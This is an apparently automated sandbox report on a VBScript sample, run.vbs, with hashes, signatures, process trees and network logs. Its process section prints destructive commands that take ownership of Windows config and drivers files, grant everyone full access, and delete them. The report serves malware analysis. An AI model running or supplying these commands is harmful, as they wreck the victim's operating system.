Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-z6m9fszamp
Target run.vbs
SHA256 bc6bad8cc9c846a3496955805bcfab7d1df5e12a8c60fa266c526a3051c99745
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

bc6bad8cc9c846a3496955805bcfab7d1df5e12a8c60fa266c526a3051c99745

Threat Level: Likely malicious

The file run.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:19

Reported

2024-08-15 21:22

Platform

win7-20240704-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:19

Reported

2024-08-15 21:21

Platform

win10v2004-20240802-en

Max time kernel

54s

Max time network

38s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

Signatures

Possible privilege escalation attempt

exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Modifies file permissions

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\Notepad.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3324 wrote to memory of 4712 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 3324 wrote to memory of 4712 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 3324 wrote to memory of 1788 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 3324 wrote to memory of 1788 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4712 wrote to memory of 3660 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 4712 wrote to memory of 3660 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 1788 wrote to memory of 5004 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 1788 wrote to memory of 5004 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 4712 wrote to memory of 2160 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 4712 wrote to memory of 2160 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 1788 wrote to memory of 4892 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 1788 wrote to memory of 4892 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\GetUninstall.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\RestartBackup.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SaveUnpublish.vbs"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 13.107.21.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp

Files

C:\Users\Admin\Desktop\DebugStep.vbs

MD5 0fd6fb32bda4ebd6d5f4695335b1ad36
SHA1 5bf718741d02e633316ced147dbcf9d4d31e4200
SHA256 73a3849e7141aac5569d2493129b00f6b833c7c16d87470c0557386b20215c8c
SHA512 fde517c0ff84560900c86f37a4c33208862092902d83d2d6028b870bad6bb14fe139ea7fa2fa6e21da8cd29ed2bf2a5410eaf45e094882f72cdfde27d4a38696